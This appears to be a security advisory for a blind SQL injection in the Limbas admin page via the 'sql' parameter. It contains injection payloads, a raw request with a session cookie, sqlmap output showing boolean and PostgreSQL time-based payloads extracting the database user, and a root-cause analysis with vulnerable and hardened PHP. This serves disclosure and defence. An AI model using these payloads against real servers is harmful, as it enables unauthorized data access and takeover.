Vendor Homepage: https://www.limbas.com/en/
Github Link: https://github.com/limbas/limbas
Tested on: Ubuntu 20.04 + Apache/2.4.57 (Debian) + PHP 8.2.13 (https://hub.docker.com/r/limbas/limbas)
After logging in to Limbas with the admin account, the parameter 'sql' can be appended to the page '/main_admin.php?action=setup_gtab_ftype&atid=1' to perform blind SQL injection. Defensive measures such as input validation or parameterized queries for SQL statements are recommended. Using this vulnerability, attackers can take control of the application, read or modify data, or exploit recent vulnerabilities in the underlying database. (https://github.com/limbas/limbas/blob/master/src/limbas_src/main_admin.php)
After logging in to Limbas with the admin account, open this address: "your_limbas_server/main_admin.php?action=setup_gtab_ftype&atid=1&sql=and%201=1"
- First, with "and%201=1" injected through 'sql', the response is normal.
- Changing the value of 'sql' to "and 1=2" changes the content displayed on the page.
- "and true" / "and false" behave the same way.
- Save the raw request as "http.txt":
GET /main_admin.php?action=setup_gtab_ftype&atid=1&sql=and%20true HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: no-cache
Cookie: metabase.DEVICE=f77093fd-d1ac-4eaf-b549-f651f07e3d57; _ga=GA1.1.244550719.1700448640; LMB_SESS_ID=npsni62iuu8l5pp3hdv3a4k4ik; limbas_explorer=1
Host: 172.43.1.2:8000
Origin: http://172.43.1.2:8000
Pragma: no-cache
Referer: http://172.43.1.2:8000/main_admin.php
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
- sqlmap can then extract data successfully:
sqlmap -r http.txt --batch --current-user
GET parameter 'sql' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 199 HTTP(s) requests:
---
Parameter: sql (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=setup_gtab_ftype&atid=1&sql=and true AND 1771=1771
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: action=setup_gtab_ftype&atid=1&sql=and true AND 8953=(SELECT 8953 FROM PG_SLEEP(5))
---
[16:47:17] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Debian
web application technology: Apache 2.4.57, PHP 8.2.13
back-end DBMS: PostgreSQL
[16:47:18] [INFO] fetching current user
[16:47:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[16:47:18] [INFO] retrieved: limbasuser
current user: 'limbasuser'
In "/src/limbas_src/admin/tables/gtab_ftype.dao" at line 1048
(https://github.com/limbas/limbas/blob/v5.0.69/src/limbas_src/admin/tables/gtab_ftype.dao)
the 'sql' variable is used to append conditions to the SQL query. When the request contains an 'ftid' parameter and its value is a number, the statement is executed with the condition "AND LMB_CONF_FIELDS.FIELD_ID = $ftid" appended. When the request does not contain 'ftid', or the supplied value is not a number, the 'sql' variable is left empty. However, Limbas converts request parameters into variables. So in exactly that case (no 'ftid', or a non-numeric one), a 'sql' request parameter overwrites the 'sql' variable with attacker-chosen content, which is then inserted into the SQL statement and completes the injection.
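As an added illustration (not Limbas code), the pattern the analysis describes, reconstructed in minimal PHP next to a hardened version of the same handler; the extract() call, the query skeleton and the PDO connection are assumptions, only the table and column names come from the page:

```php
<?php
// Constructed illustration of the pattern described above; not Limbas code.
// Assumed: request parameters become local variables (extract-style) before
// $sql is conditionally assigned, and $sql is then concatenated into the query.

// --- Vulnerable shape ---------------------------------------------------------
function buildFieldQueryVulnerable(array $request): string
{
    // Request parameters become variables, so a request carrying
    // "sql=..." defines $sql here before the code below ever runs.
    extract($request);

    if (isset($ftid) && is_numeric($ftid)) {
        $sql = ' AND LMB_CONF_FIELDS.FIELD_ID = ' . $ftid;
    }
    // No ftid (or a non-numeric one): $sql keeps whatever the request supplied.
    return 'SELECT * FROM LMB_CONF_FIELDS WHERE 1=1' . ($sql ?? '');
}

// --- Hardened shape -----------------------------------------------------------
function buildFieldQueryHardened(PDO $db, array $request): PDOStatement
{
    // 1. Never let request data define local variables: read keys explicitly.
    $ftid = $request['ftid'] ?? null;

    // 2. Initialise the fragment unconditionally, so it is never user-controlled.
    $sql    = '';
    $params = [];
    if ($ftid !== null && ctype_digit((string) $ftid)) {
        $sql             = ' AND LMB_CONF_FIELDS.FIELD_ID = :ftid';
        $params[':ftid'] = (int) $ftid;
    }

    // 3. Bind the value instead of interpolating it (PostgreSQL via PDO).
    $stmt = $db->prepare('SELECT * FROM LMB_CONF_FIELDS WHERE 1=1' . $sql);
    $stmt->execute($params);
    return $stmt;
}

// Constructed request mirroring the advisory: no ftid, attacker-supplied sql.
$request = ['action' => 'setup_gtab_ftype', 'atid' => '1', 'sql' => ' and false'];
echo buildFieldQueryVulnerable($request), PHP_EOL;
// The hardened builder ignores the 'sql' key entirely; only ftid is ever bound.
```

The vulnerable builder echoes the injected fragment straight into the WHERE clause, while the hardened one produces the same query shape with the attacker-controlled key never reaching the statement.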